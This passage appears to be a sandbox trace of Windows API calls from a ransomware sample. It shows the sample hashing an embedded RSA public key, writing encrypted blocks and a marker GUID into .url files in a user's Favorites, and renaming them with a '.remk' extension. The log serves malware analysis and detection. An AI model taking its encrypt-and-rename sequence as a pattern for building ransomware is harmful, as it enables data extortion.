KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0234.027] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0234.027] CryptAcquireContextW (in: phProv=0x3adfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x3adfa50*=0x694398) returned 1 [0234.029] CryptCreateHash (in: hProv=0x694398, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x3adfa58 | out: phHash=0x3adfa58) returned 1 [0234.029] CryptHashData (hHash=0x31de170, pbData=0x325fb40, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0234.029] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x0, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x3adfa54) returned 1 [0234.029] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x31a0f08 [0234.029] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x31a0f08, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x31a0f08, pdwDataLen=0x3adfa54) returned 1 [0234.029] GetLastError () returned 0x0 [0234.029] CryptDestroyHash (hHash=0x31de170) returned 1 [0234.029] CryptReleaseContext (hProv=0x694398, dwFlags=0x0) returned 1 [0234.029] UuidCreate (in: Uuid=0x3adfa48 | out: Uuid=0x3adfa48) returned 0x0 [0234.029] UuidToStringA (in: Uuid=0x3adfa48, StringUuid=0x3adfa40 | out: StringUuid=0x3adfa40) returned 0x0 [0234.029] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a90 [0234.029] RpcStringFreeA (in: String=0x3adfa40 | out: String=0x3adfa40) returned 0x0 [0234.029] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x31f7b30, Size=0x218) returned 0x37b1b88 [0234.029] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x37b5b70 [0234.030] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x85, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0234.030] WriteFile (in: hFile=0x640, lpBuffer=0x3192918*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x3192918*, lpNumberOfBytesWritten=0x3adfb50*=0x100, lpOverlapped=0x0) returned 1 [0234.030] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0234.030] WriteFile (in: hFile=0x640, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x3adfb50*=0x26, lpOverlapped=0x0) returned 1 [0234.030] CloseHandle (hObject=0x640) returned 1 [0234.031] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65e698 [0234.031] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8a0) returned 0x37bc408 [0234.031] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSNBC News.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msnbc news.url"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSNBC News.url.remk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msnbc news.url.remk")) returned 1 [0234.033] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSNBC News.url", cAlternateFileName="MSNBCN~1.URL")) returned 0 [0234.033] FindClose (in: hFindFile=0x31de130 | out: hFindFile=0x31de130) returned 1 [0234.034] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a20 | out: hHeap=0x630000) returned 1 [0234.034] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37ba600 | out: hHeap=0x630000) returned 1 [0234.034] PeekMessageW (in: lpMsg=0x3adff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adff08) returned 0 [0234.034] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x37ba600 [0234.034] PeekMessageW (in: lpMsg=0x3adfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adfb74) returned 0 [0234.034] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x37ba588 [0234.034] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0234.034] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0234.034] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37ba588 | out: hHeap=0x630000) returned 1 [0234.034] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x37ba588 [0234.034] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0234.034] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0234.034] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37ba588 | out: hHeap=0x630000) returned 1 [0234.034] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x37ba588 [0234.034] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0234.034] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0234.034] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37ba588 | out: hHeap=0x630000) returned 1 [0234.034] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x37ba588 [0234.034] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0234.034] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0234.034] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37ba588 | out: hHeap=0x630000) returned 1 [0234.035] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x37ba588 [0234.035] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0234.035] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0234.035] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37ba588 | out: hHeap=0x630000) returned 1 [0234.035] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x37ba588 [0234.035] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0234.035] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0234.035] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37ba588 | out: hHeap=0x630000) returned 1 [0234.035] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x37ba588 [0234.035] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0234.035] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc2e) returned 0x37bfdb0 [0234.035] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0234.035] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bfdb0 | out: hHeap=0x630000) returned 1 [0234.035] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37ba588 | out: hHeap=0x630000) returned 1 [0234.035] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x37ba588 [0234.035] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0234.035] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0234.035] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37ba588 | out: hHeap=0x630000) returned 1 [0234.035] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x37ba588 [0234.035] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0234.035] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0234.035] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37ba588 | out: hHeap=0x630000) returned 1 [0234.036] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x37ba588 [0234.036] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x37b5b70 [0234.036] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0234.036] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37ba588 | out: hHeap=0x630000) returned 1 [0234.036] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x37ba588 [0234.036] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x37b5b70 [0234.036] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0234.036] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37ba588 | out: hHeap=0x630000) returned 1 [0234.036] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x37ba588 [0234.036] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0234.036] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0234.036] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37ba588 | out: hHeap=0x630000) returned 1 [0234.036] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x37ba588 [0234.036] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0234.036] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0234.036] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37ba588 | out: hHeap=0x630000) returned 1 [0234.036] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x37ba588 [0234.036] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0234.036] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0234.036] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37ba588 | out: hHeap=0x630000) returned 1 [0234.036] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x37ba588 [0234.036] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0234.036] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0234.037] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37ba588 | out: hHeap=0x630000) returned 1 [0234.037] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x37ba588 [0234.037] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0234.037] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0234.037] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37ba588 | out: hHeap=0x630000) returned 1 [0234.037] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x37ba588 [0234.037] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0234.037] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0234.037] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37ba588 | out: hHeap=0x630000) returned 1 [0234.037] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x37ba588 [0234.037] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0234.037] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0234.037] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37ba588 | out: hHeap=0x630000) returned 1 [0234.037] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x37ba588 [0234.037] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\") returned="Windows Live\\" [0234.037] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\") returned="Favorites\\" [0234.037] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0234.037] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0234.037] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0234.038] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0234.038] PathFindFileNameW (pszPath="") returned="" [0234.038] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\*", lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d71a60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x31de130 [0234.039] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37ba588 | out: hHeap=0x630000) returned 1 [0234.039] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d71a60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0234.039] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d8930c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Get Windows Live.url", cAlternateFileName="GETWIN~1.URL")) returned 1 [0234.039] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Get Windows Live.url") returned=".url" [0234.039] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Get Windows Live.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\get windows live.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x640 [0234.042] GetFileSizeEx (in: hFile=0x640, lpFileSize=0x3adfb40 | out: lpFileSize=0x3adfb40*=133) returned 1 [0234.042] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3c20000 [0234.045] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x5f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0234.045] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x3adfb78, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb78*=0x26, lpOverlapped=0x0) returned 1 [0234.046] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x3adfb70, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb70*=0x85, lpOverlapped=0x0) returned 1 [0234.046] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0234.046] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0234.046] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0234.046] CryptAcquireContextW (in: phProv=0x3adfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x3adfa50*=0x694398) returned 1 [0234.048] CryptCreateHash (in: hProv=0x694398, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x3adfa58 | out: phHash=0x3adfa58) returned 1 [0234.048] CryptHashData (hHash=0x31de170, pbData=0x325fb40, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0234.048] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x0, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x3adfa54) returned 1 [0234.048] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x31a0f08, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x31a0f08, pdwDataLen=0x3adfa54) returned 1 [0234.048] GetLastError () returned 0x0 [0234.048] CryptDestroyHash (hHash=0x31de170) returned 1 [0234.048] CryptReleaseContext (hProv=0x694398, dwFlags=0x0) returned 1 [0234.048] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325fb40 | out: hHeap=0x630000) returned 1 [0234.048] UuidCreate (in: Uuid=0x3adfa48 | out: Uuid=0x3adfa48) returned 0x0 [0234.048] UuidToStringA (in: Uuid=0x3adfa48, StringUuid=0x3adfa40 | out: StringUuid=0x3adfa40) returned 0x0 [0234.048] RpcStringFreeA (in: String=0x3adfa40 | out: String=0x3adfa40) returned 0x0 [0234.048] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0234.048] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x31f7b30, Size=0x218) returned 0x37b1b88 [0234.049] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x85, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0234.049] WriteFile (in: hFile=0x640, lpBuffer=0x3192918*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x3192918*, lpNumberOfBytesWritten=0x3adfb50*=0x100, lpOverlapped=0x0) returned 1 [0234.049] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3192918 | out: hHeap=0x630000) returned 1 [0234.049] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0234.049] WriteFile (in: hFile=0x640, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x3adfb50*=0x26, lpOverlapped=0x0) returned 1 [0234.049] CloseHandle (hObject=0x640) returned 1 [0234.054] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b6420 [0234.054] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8a0) returned 0x37bc408 [0234.054] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b6420 | out: hHeap=0x630000) returned 1 [0234.054] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Get Windows Live.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\get windows live.url"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Get Windows Live.url.remk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\get windows live.url.remk")) returned 1 [0234.056] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc408 | out: hHeap=0x630000) returned 1 [0234.056] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0234.057] VirtualFree (lpAddress=0x3c20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0234.058] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a4610 | out: hHeap=0x630000) returned 1 [0234.058] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d8930c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Windows Live Gallery.url", cAlternateFileName="WINDOW~2.URL")) returned 1 [0234.058] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x37ba588 [0234.058] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa6) returned 0x31a4610 [0234.058] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37ba588 | out: hHeap=0x630000) returned 1 [0234.058] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Gallery.url") returned=".url" [0234.058] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Gallery.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\windows live gallery.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x640 [0234.059] GetFileSizeEx (in: hFile=0x640, lpFileSize=0x3adfb40 | out: lpFileSize=0x3adfb40*=133) returned 1 [0234.060] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3c20000 [0234.062] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x5f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0234.063] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x3adfb78, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb78*=0x26, lpOverlapped=0x0) returned 1 [0234.064] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, 